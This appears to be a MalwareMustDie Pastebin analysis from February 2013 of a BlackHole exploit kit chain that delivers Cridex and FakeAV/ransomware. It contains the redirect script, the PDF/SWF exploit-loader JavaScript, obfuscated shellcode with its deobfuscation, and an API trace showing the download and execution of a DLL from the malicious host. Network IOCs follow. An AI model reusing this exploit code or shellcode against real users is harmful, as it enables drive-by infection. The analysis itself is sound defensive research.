API tools faq
paste
Advertisement
MalwareMustDie

#MalwareMustDie - ejjiipprr,ru : GeoIP Cridex + Ransomware

MalwareMustDie
Feb 20th, 2013
1,617
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 20.20 KB | None | 0 0
raw download clone embed print report
  1. =========================================================
  2. Title: #MalwareMustDie - ejjiipprr,ru : GeoIP Cridex + Ransomware
  3. #MalwareMustDie! @unixfreaxjp /malware]$ date
  4. Tue Feb 19 15:26:25 JST 2013
  5.  
  6. BlackHole Exploit Kit with Double infector:
  7. Cridex & FakeAV/Ransomer (depends on your request IP)
  8. Landing page: h00p://ejjiipprr,ru:8080/forum/links/public_version,php
  9. IP: 195・210・47・208, 50・31・1・104, 66・249・23・64
  10. payloads:
  11. 2013/02/19 14:07 ff74196d1aacd629ee7af6955c837a24 94,208 readme・exe (cridex)
  12. 2013/02/19 14:06 c182dfc3418573d61fdc7dcc11eb319d 114,688 info・exe (ransomer)
  13. Landing page's PLuginDetect:
  14. 1: http://pastebin.com/mCJy7GEn
  15. 2: http://pastebin.com/LSUCnvN6
  16. =========================================================
  17.  
  18. //---------changes detected in today's infector・・・
  19.  
  20. @unixfreaxjp /malware]$ date
  21. Tue Feb 19 14:17:40 JST 2013
  22. @unixfreaxjp /malware]$ curl hxxp://webworks・investorship・co・jp/page-329・htm
  23. <html>
  24. <head>
  25. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  26. <title>Please wait</title>
  27. </head>
  28. <body>
  29. <h1><b>Please wait a moment ・・・ You will be forwarded・・・ </h1></b>
  30. <h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
  31.  
  32.  
  33. <script>
  34. var1=49;
  35. var2=var1;
  36. if(var1==var2) {document・location="hxxp://ejjiipprr,ru:8080/forum/links/public_version,php";}
  37. </script>
  38.  
  39.  
  40. </body>
  41.  
  42. @unixfreaxjp /malware]$ myget --head -O/dev/null -d hxxp://webworks・investorship・co・jp/page-329・htm
  43. DEBUG output freebsd9・1・
  45. HTTP/1・1 200 OK
  46. Date: Tue, 19 Feb 2013 05:17:54 GMT
  47. Server: Apache
  48. Last-Modified: Tue, 19 Feb 2013 05:06:13 GMT <======
  49.  
  50. //-----------------download--------
  51.  
  52. --12:56:52-- h00p://webworks・investorship・co・jp/page-329・htm
  53. => `page-329・htm'
  54. Resolving webworks・investorship・co・jp・・・ seconds 0・00, 117・20・100・110
  55. Caching webworks・investorship・co・jp => 117・20・100・110
  56. Connecting to webworks・investorship・co・jp|117・20・100・110|:80・・・ seconds 0・00, connected・
  58. GET /page-329・htm HTTP/1・0
  59. Host: webworks・investorship・co・jp
  60. HTTP request sent, awaiting response・・・
  62. HTTP/1・1 200 OK
  63. Date: Tue, 19 Feb 2013 03:56:44 GMT
  64. Server: Apache
  65. Last-Modified: Tue, 19 Feb 2013 03:42:14 GMT
  66. ETag: "11850611-1b1-5122f496"
  67. Accept-Ranges: bytes
  68. Content-Length: 433
  69. Connection: close
  70. Content-Type: text/html
  72. 200 OK
  73. Length: 433 [text/html]
  74. 12:56:52 (4・99 MB/s) - `page-329・htm' saved [433/433]
  75.  
  76. //----------------cat-------------------
  77.  
  78. $ cat page-329・htm
  79. <html>
  80. <head>
  81. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  82. <title>Please wait</title>
  83. </head>
  84. <body>
  85. <h1><b>Please wait a moment ・・・ You will be forwarded・・・ </h1></b>
  86. <h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
  87.  
  88. <script>
  89. var1=49;
  90. var2=var1;
  91. if(var1==var2) {document・location="h00p://ejjiipprr,ru:8080/forum/links/public_version,php";}
  92. </script>
  93.  
  94. //------------- get the landing page----------------
  95.  
  96. // cant connect directly, got 502, looks I got blocked by these moronz now・・
  97.  
  98. --13:02:20-- h00p://ejjiipprr,ru:8080/forum/links/public_version,php
  99. => `public_version,php・1'
  100. Resolving ejjiipprr,ru・・・ seconds 0・00, 195・210・47・208, 50・31・1・104, 66・249・23・64
  101. Caching ejjiipprr,ru => 195・210・47・208 50・31・1・104 66・249・23・64
  102. Connecting to ejjiipprr,ru|195・210・47・208|:8080・・・ seconds 0・00, connected・
  104. HTTP/1・1 502 Bad Gateway
  105. Server: nginx/1・0・10
  106. Date: Tue, 19 Feb 2013 04:02:13 GMT
  107. Content-Type: text/html; charset=CP-1251
  108. Connection: keep-alive
  109. X-Powered-By: PHP/5・3・18-1~dotdeb・0
  110. Vary: Accept-Encoding
  111. Content-Length: 0
  112.  
  113.  
  114. // retried・・・・・(bouncer)
  115.  
  116. --13:00:55-- h00p://ejjiipprr,ru:8080/forum/links/public_version,php
  117. => `public_version,php'
  118. Connecting to myproxy:myport・・・ seconds 0・00, connected・
  120. GET h00p://ejjiipprr,ru:8080/forum/links/public_version,php HTTP/1・0
  121. Referer: h00p://malwaremustdie・org
  122. Host: ejjiipprr,ru:8080
  123. Connection: keep-alive
  124. Proxy request sent, awaiting response・・・
  126. HTTP/1・1 200 OK
  127. Server: nginx/1・0・10
  128. Date: Tue, 19 Feb 2013 04:00:59 GMT
  129. Content-Type: text/html; charset=CP-1251
  130. Connection: close
  131. X-Powered-By: PHP/5・3・18-1~dotdeb・0
  132. Vary: Accept-Encoding
  134. 200 OK
  135. Length: unspecified [text/html]
  136. 13:01:09 (120・01 KB/s) - `public_version,php' saved [156929] <=== take one・・・
  137.  
  138.  
  139. // retried・・・(gatling IP gunz・・)
  140.  
  141.  
  142. --13:05:53-- h00p://ejjiipprr,ru:8080/forum/links/public_version,php
  143. => `public_version,php'
  144. Resolving ejjiipprr,ru・・・ 66・249・23・64, 50・31・1・104, 195・210・47・208
  145. Caching ejjiipprr,ru => 66・249・23・64 50・31・1・104 195・210・47・208
  146. Connecting to ejjiipprr,ru|66・249・23・64|:8080・・・ connected・
  148. GET /forum/links/public_version,php HTTP/1・0
  150. Host: ejjiipprr,ru:8080
  151. HTTP request sent, awaiting response・・・
  153. HTTP/1・1 200 OK
  154. Server: nginx/1・0・10
  155. Date: Tue, 19 Feb 2013 04:05:55 GMT
  156. Content-Type: text/html; charset=CP-1251
  157. Connection: close
  158. X-Powered-By: PHP/5・3・18-1~dotdeb・0
  159. Vary: Accept-Encoding
  161. 200 OK
  162. Length: unspecified [text/html]
  163. 13:05:56 (53・84 KB/s) - `public_version,php' saved [36665]
  164.  
  165.  
  166. //--------two landing page(S)------
  167.  
  168. 2013/02/19 13:17 cdb228f7ee3a261d4f3a5d4b723c085a 57,675 public_version-2,php
  169. 2013/02/19 13:01 f607dcc1b5a95a284238741f886940ac 56,929 public_version,php
  170.  
  171. //------1st plugin detect・・・・・
  172.  
  173.  
  174. // PDFs・・・・
  175.  
  176.  
  177. function p1(){
  178. var d = document・createElement("object");
  179. d・setAttribute("data", "/forum/links/public_version,php?edayjh=" + x("de300") + "&mnnq="
  180. + x("lju") + "&tagwmov=1j:33:32:1l:1g:1i:1o:1n:1o:1i&xllpos=" + x(pdfver・join("・")));
  181. d・setAttribute("type", "application/pdf");
  182. document・body・appendChild(d);
  183. }
  184. function p2(){
  185. var d = document・createElement("object");
  186. d・setAttribute("data", "/forum/links/public_version,php?lwgbb=" + x("de300") +
  187. "&lgltly=" + x("r") + "&mlqi=1j:33:32:1l:1g:1i:1o:1n:1o:1i&eshngcjb=" + x(pdfver・join(
  188. "・")));
  189. d・setAttribute("type", "application/pdf");
  190. document・body・appendChild(d);
  191. }
  192.  
  193. // SWF
  194.  
  195. function getCN(){
  196. return "/forum/links/public_version,php?zivqqsfs=" + x("de300") + "&ljpfu=" + x("hsosw")
  197. + "&ddpp=1j:33:32:1l:1g:1i:1o:1n:1o:1i&benbw=lvkkbwv"
  198. }
  199.  
  200. function ff2(){
  201. var oSpan = document・createElement("span");
  202. var url = "/forum/links/public_version,php?bbbiywar=" + x("de300") + "&wisduk=" + x(
  203. "toiu") + "&dej=1j:33:32:1l:1g:1i:1o:1n:1o:1i&mkej=fvgwpin";
  204. oSpan・innerHTML = "
  205. <object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id
  206. '><param name='movie' value='" + url + "
  207. ' /><param name='allowScriptAccess' value='always' /><param name='Play' value='0' /><embed
  208. src='" + url + "
  209. ' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash
  210. ' width='10' height='10'></embed></object>";
  211. document・body・appendChild(oSpan);
  212. }
  213.  
  214. // shellcode
  215.  
  216.  
  217. function getshellcode(){
  218. var a = "828・・1414!%"
  219. ・split("")・reverse()・join("");
  220. return a["replace"](/\%!/g, "%" + "u")
  221. }
  222.  
  223.  
  224. //------ second plugin detect・・・
  225.  
  226.  
  227. // PDFs・・・・(none!)
  228.  
  229. function p1(){
  230. return false;
  231. }
  232. function p2(){
  233. return false;
  234. }
  235. function p3(){
  236. return false;
  237. }
  238.  
  239. // SWF・・・・
  240.  
  241. function getCN(){
  242. return "/forum/links/public_version,php?dxfcb=" + x("50f08") + "&arfxjm=" + x("qfsnn") +
  243. "&sxclfr=2v:1k:1m:32:33:1k:1k:31:1j:1o&gakchxt=hxekxtdj"
  244. }
  245.  
  246. function ff2(){
  247. var oSpan = document・createElement("span");
  248. var url = "/forum/links/public_version,php?cmfzmg=" + x("50f08") + "&zvdjvx=" + x("pixr"
  249. ) + "&pxbu=2v:1k:1m:32:33:1k:1k:31:1j:1o&bmobk=jmb";
  250. oSpan・innerHTML = "
  251. <object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id
  252. '><param name='movie' value='" + url + "
  253. ' /><param name='allowScriptAccess' value='always' /><param name='Play' value='0' /><embed
  254. src='" + url + "
  255. ' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash
  256. ' width='10' height='10'></embed></object>";
  257. document・body・appendChild(oSpan);
  258. }
  259.  
  260. // shellcode・・・・
  261.  
  262. function getshellcode(){
  263. var a = "8282・・%1414!%"
  264. ・split("")・reverse()・join("");
  265. return a["replace"](/\%!/g, "%" + "u")
  266. }
  267.  
  268. //-------------------cracks engine・・・・
  269.  
  270.  
  271. // let's skip the infector this time・・ we must check whether they changed the
  272. // malware payloads or not・・
  273. //
  274. // ========================================
  275. // get the deobs + crack both shellcodes:
  276. // ========================================
  277.  
  278.  
  279. var shellcode1="8282!%51a4!%14d5!%O4eO・・
  280. eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d・・
  281. !%b1a1!%e5a5!%cOc2!%fec6!%f4b5!%a5d4!%・・
  282. 36!%e43a!%b25f!%67cO!%673a!%d5ec!%3173・・
  283. O185!%cfbe!%4ecf!%6638!%1414!%1414!%";
  284.  
  285. var shellcode2="8282!%51f4!%34d5!%54eO・・
  286. eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d・・
  287. !%b1a1!%e5a5!%cOc2!%fec6!%f4b5!%a5d4!%・・
  288. 36!%e43a!%b25f!%67cO!%673a!%d5ec!%3173・・
  289. O185!%cfbe!%4ecf!%6638!%1414!%1414!%";
  290.  
  291.  
  292. var a = shellcode1・split("")・reverse()・join("");
  293. var xxx= a["replace"](/\%!/g, "%" + "u");
  294. document・write(xxx);
  295.  
  296. var b = shellcode2・split("")・reverse()・join("");
  297. var yyy= b["replace"](/\%!/g, "%" + "u");
  298. document・write("\n\n"+yyy);
  299.  
  300. //Output:
  301.  
  302. %u4141%u4141%u8366%ufce4%uebfc%u581O%uc93・・
  303. 13%uce5d%ua376%uOc76%uf52b%ua34e%u6324%u6・・
  304. 4d5a%u5b4f%u6cef%u2cOc%u5a5e%u1a1b%u6cef%・・
  305. %ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e5・・
  306. 4O%u5d41%u4a15%u2828
  307.  
  308. %u4141%u4141%u8366%ufce4%uebfc%u581O%uc93・・
  309. 13%uce5d%ua376%uOc76%uf52b%ua34e%u6324%u6・・
  310. 4d5a%u5b4f%u6cef%u2cOc%u5a5e%u1a1b%u6cef%・・
  311. %ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e5・・
  312. 45%u5d43%u4f15%u2828
  313.  
  314. // let's mix the shellcodes now ;-))) experimental!
  315.  
  316. %u4141 % u4141 % u8366 % ufce4 % uebfc % u581O・・
  317. u68a3 % ua324 % u3458 % ua37e % u2O5e % uf31b ・・
  318. u64c3 % u7e79 % u5da3 % ua314 % u1d5c % u2b5O ・・
  319. u3713 % uce5d % ua376 % uOc76 % uf52b % ua34e ・・
  320. u2b5c % uc3be % ua3db % u2O4O % udfa3 % u2d42 ・・
  321. uab38 % u2deb % ucbd7 % u474O % u2846 % u4O28 ・・
  322. uOc2c % u4d5a % u5b4f % u6cef % u2cOc % u5a5e ・・
  323. u6cef % u2d35 % u4cO6 % u4444 % u6cee % u2135 ・・
  324. u422c % uab28 % u24c3 % ud77b % u2c7e % uebab ・・
  325. ubOc4 % ua2d6 % ua126 % u2947 % u1b95 % ua2e2 ・・
  326. uO718 % u474e % u5d5a % uO745 % u4144 % u4346 ・・
  327. u1912 % u124e % u4e19 % u41Oe % u154d % u4219 ・・
  328. u5OOe % u155d % uOe4O % u5d41 % u4a15 % u2828 ・・
  329. uccad % u1c5d % u77c1 % ue81b % ua34c % u1868 ・・
  330. u2e11 % ud35d % u1caf % uadOc % u5dcc % uc179 ・・
  331. uda1O % u2O5c % ue3e9 % u2b25 % u68f2 % ud9c3 ・・
  332. ueb71 % u7bc3 % ua385 % uO84O % u55a8 % u1b24 ・・
  333. u2828 % uab78 % u31e8 % u7d78 % uc4a3 % u76a3 ・・
  334. ua95a % u2cc4 % u2829 % ua528 % uOc74 % uef24 ・・
  335. u1bcO % u79e1 % u6cef % u2835 % u585f % u5c4a ・・
  336. u7ed7 % uad3c % u5de8 % u423e % u7b28 % u7ed7 ・・
  337. ud7d6 % u2O7e % ub4cO % ud7d6 % ua6d7 % u2666 ・・
  338. u5841 % u5a58 % uO65a % u5d5a % u1O12 % u1O18 ・・
  339. u5O17 % u154e % u4319 % u1912 % u124e % u1b1b ・・
  340. u1219 % u4219 % u1912 % uOe47 % u154e % u4319 ・・
  341.  
  342. // I doubt there will be ascii url so・・・
  343. // compile it・・・ get the objects, disasm it and match it with the windows API, see this double scheme works or not・・・
  344.  
  345. 0x7c801ad9 kernel32・VirtualProtect(lpAddress=0x4020cf, dwSize=255)
  346. 0x7c801d7b kernel32・LoadLibraryA(lpFileName=urlmon)
  347. 0x7c835dfa kernel32・GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
  348. 0x1a494bbe urlmon・URLDownloadToFileA(pCaller=0, szURL=h00p://ejjiipprr,ru:8080/forum/links/public_version,php?xf=1k:1f:33:1f:1n&ne=2v:1k:1m:32:33:1k:1k:31:1j:1o&f=1k&df=m&ku=g, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll)
  349. 0x7c86250d kernel32・WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
  350. 0x7c86250d kernel32・WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
  351. 0x7c81cb3b kernel32・TerminateThread(dwExitCode=0)
  352. 0x7c801ad9 kernel32・VirtualProtect(lpAddress=0x4020cf, dwSize=255)
  353. 0x7c801d7b kernel32・LoadLibraryA(lpFileName=urlmon)
  354. 0x7c835dfa kernel32・GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
  355. 0x1a494bbe urlmon・URLDownloadToFileA(pCaller=0, szURL=h00p://ejjiipprr,ru:8080/forum/links/public_version,php?kf=31:32:1i:1f:1f&ie=1j:33:32:1l:1g:1i:1o:1n:1o:1i&l=1k&xu=h&iu=b, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll)
  356. 0x7c86250d kernel32・WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
  357. 0x7c86250d kernel32・WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
  358. 0x7c81cb3b kernel32・TerminateThread(dwExitCode=0)
  359.  
  360. // it works :-)) good!
  361.  
  362. // fetch the mess・・・
  363.  
  364. --14:07:23-- h00p://ejjiipprr,ru:8080/forum/links/public_version,php?xf=1k:1f:33:1f:1n&ne=2v:1k:1m:32:33:1k:1k:31:1j:1o&f=1k&df=m&ku=g
  365. => `public_version,php@xf=1k%3A1f%3A33%3A1f%3A1n&ne=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&f=1k&df=m&ku=g'
  366. Resolving ejjiipprr,ru・・・ seconds 0・00, 50・31・1・104, 66・249・23・64, 195・210・47・208
  367. Caching ejjiipprr,ru => 50・31・1・104 66・249・23・64 195・210・47・208
  368. Connecting to ejjiipprr,ru|50・31・1・104|:8080・・・ seconds 0・00, connected・
  370. GET /forum/links/public_version,php?xf=1k:1f:33:1f:1n&ne=2v:1k:1m:32:33:1k:1k:31:1j:1o&f=1k&df=m&ku=g HTTP/1・0
  371. Referer: h00p://malwaremustdie・org
  372. User-Agent: #Smash greedy malware moronz!
  373. Host: ejjiipprr,ru:8080
  374. HTTP request sent, awaiting response・・・
  376. HTTP/1・1 200 OK
  377. Server: nginx/1・0・10
  378. Date: Tue, 19 Feb 2013 05:07:16 GMT
  379. Content-Type: application/x-msdownload
  380. Connection: keep-alive
  381. X-Powered-By: PHP/5・3・18-1~dotdeb・0
  382. Pragma: public
  383. Expires: Tue, 19 Feb 2013 05:07:16 GMT
  384. Cache-Control: must-revalidate, post-check=0, pre-check=0
  385. Cache-Control: private
  386. Content-Disposition: attachment; filename="readme・exe"
  387. Content-Transfer-Encoding: binary
  388. Content-Length: 94208
  390. 200 OK
  391. Length: 94,208 (92K) [application/x-msdownload]
  392. 100%[====================================>] 94,208 98・81K/s
  393. 14:07:25 (98・48 KB/s) - `public_version,php@xf=1k%3A1f%3A33%3A1f%3A1n&ne=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&f=1k&df=m&ku=g' saved [94208/94208]
  395. GET /forum/links/public_version,php?kf=31:32:1i:1f:1f&ie=1j:33:32:1l:1g:1i:1o:1n:1o:1i&l=1k&xu=h&iu=b HTTP/1・0
  396. Referer: h00p://malwaremustdie・org
  397. User-Agent: #Smash greedy malware moronz!
  398. Host: ejjiipprr,ru:8080
  399. HTTP request sent, awaiting response・・・
  401. HTTP/1・1 200 OK
  402. Server: nginx/1・0・10
  403. Date: Tue, 19 Feb 2013 05:06:40 GMT
  404. Content-Type: application/x-msdownload
  405. Connection: keep-alive
  406. X-Powered-By: PHP/5・3・18-1~dotdeb・0
  407. Pragma: public
  408. Expires: Tue, 19 Feb 2013 05:06:40 GMT
  409. Cache-Control: must-revalidate, post-check=0, pre-check=0
  410. Cache-Control: private
  411. Content-Disposition: attachment; filename="info・exe"
  412. Content-Transfer-Encoding: binary
  413. Content-Length: 114688
  415. 200 OK
  416. Length: 114,688 (112K) [application/x-msdownload]
  417. 100%[====================================>] 114,688 107・17K/s
  418. 14:06:50 (106・95 KB/s) - `public_version,php@kf=31%3A32%3A1i%3A1f%3A1f&ie=1j%3A33%3A32%3A1l%3A1g%3A1i%3A1o%3A1n%3A1o%3A1i&l=1k&xu=h&iu=b' saved [114688/114688]
  419.  
  420.  
  421. // samples evidence・・・
  422.  
  423. info・exe c182dfc3418573d61fdc7dcc11eb319d
  424. readme・exe ff74196d1aacd629ee7af6955c837a24
  425.  
  426. // you can see the snapshot of downloaded binary here・・・
  427. // the smaller size is Cridex and the Bigger size is Ransomer/FakeAlert
  428.  
  429. http://urlquery・net/report・php?id=1039316
  430. http://urlquery・net/report・php?id=1039314
  431.  
  432. // or the VT checks here・・・
  433.  
  434. https://www・virustotal・com/en/file/3cb0a852b902c1beffa70e6405825dfe71ad28141f8bcc369880af9f7e692b84/analysis/1361252424/
  435. https://www・virustotal・com/en/file/6cd8ae852bd023982b292a714d3e1582537606cc655a74c1fef152742c215e00/analysis/1361252413/
  436.  
  437. // and anubis for your conveniences:
  438.  
  439. http://anubis・iseclab・org/?action=result&task_id=1ab45db359838bee4dd1cfc29c34675ef
  440. http://anubis・iseclab・org/?action=result&task_id=148f40a21af53f524693c43eb52b6da6e
  441.  
  442.  
  443.  
  444. // ================================
  445. // NETWORK ANALYSIS
  446. //==================================
  447.  
  448.  
  449. // IP:
  450.  
  451. ejjiipprr,ru:8080 46,175,224,21 - 195,210,47,208 - 50,31,1,104 - 66,249,23,64
  452.  
  453. A 195・210・47・208, 50・31・1・104, 66・249・23・64
  454.  
  455.  
  456. // SOA:
  457.  
  458. primary name server = ns1・ejjiipprr,ru
  459. responsible mail addr = root・ejjiipprr,ru
  460. serial = 2012010101
  461. refresh = 604800 (7 days)
  462. retry = 1800 (30 mins)
  463. expire = 1800 (30 mins)
  464. default TTL = 60 (1 min)
  465.  
  466. // evil ns lists:
  467.  
  468. ns1・ejjiipprr,ru・ 1038 IN A 41・168・5・140
  469. ns2・ejjiipprr,ru・ 1038 IN A 110・164・58・250
  470. ns3・ejjiipprr,ru・ 1038 IN A 210・71・250・131
  471. ns4・ejjiipprr,ru・ 1038 IN A 203・171・234・53
  472. ns5・ejjiipprr,ru・ 60 IN A 110・164・58・250
  473. ns6・ejjiipprr,ru・ 60 IN A 41・168・5・140
  474.  
  475. // Whois:
  476. domain: EJJIIPPRR,ru
  477. nserver: ns1・ejjiipprr,ru・ 41・168・5・140
  478. nserver: ns2・ejjiipprr,ru・ 110・164・58・250
  479. nserver: ns3・ejjiipprr,ru・ 210・71・250・131
  480. nserver: ns4・ejjiipprr,ru・ 203・171・234・53
  481. state: REGISTERED, DELEGATED, UNVERIFIED
  482. person: Private Person
  483. registrar: NAUNET-REG-RIPN
  484. admin-contact: https://client・naunet,ru/c/whoiscontact
  485. created: 2013・02・11
  486. paid-till: 2014・02・11
  487. free-date: 2014・03・14
  488. source: TCI
  489.  
  490. // Recent current malware moronz group used domains (historical records)
  491. // to be used as reference:
  492.  
  493. emaianem,ru A 66・249・23・64
  494.  
  495. enakinukia,ru A 46・175・224・21
  496. exibonapa,ru A 46・175・224・21
  497. esigbsoahd,ru A 46・175・224・21
  498. egihurinak,ru A 46・175・224・21
  499. exiansik,ru A 46・175・224・21
  500. emaianem,ru A 46・175・224・21
  501. estipaindo,ru A 46・175・224・21
  502. epilarikko,ru A 46・175・224・21
  503. emalenoko,ru A 46・175・224・21
  504. eminakotpr,ru A 46・175・224・2
  505.  
  506. enakinukia,ru A 195・210・47・208
  507. exibonapa,ru A 195・210・47・208
  508. esigbsoahd,ru A 195・210・47・208
  509. epianokif,ru A 195・210・47・208
  510. elistof,ru A 195・210・47・208
  511. egihurinak,ru A 195・210・47・208
  512. exiansik,ru A 195・210・47・208
  513. ewinhdutik,ru A 195・210・47・208
  514. efjjdopkam,ru A 195・210・47・208
  515. eipuonam,ru A 195・210・47・208
  516. emaianem,ru A 195・210・47・208
  517. epionkalom,ru A 195・210・47・208
  518. estipaindo,ru A 195・210・47・208
  519. ejiposhhgio,ru A 195・210・47・208
  520. epilarikko,ru A 195・210・47・208
  521. emalenoko,ru A 195・210・47・208
  522. eminakotpr,ru A 195・210・47・208
  523.  
  524.  
  525. // all are using same evil dns :
  526.  
  527. 41・168・5・140
  528. 110・164・58・250
  529. 210・71・250・131
  530. 203・171・234・53
  531. 110・164・58・250
  532. 41・168・5・140
  533.  
  534.  
  535. ------
  536. #MalwareMustDie!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!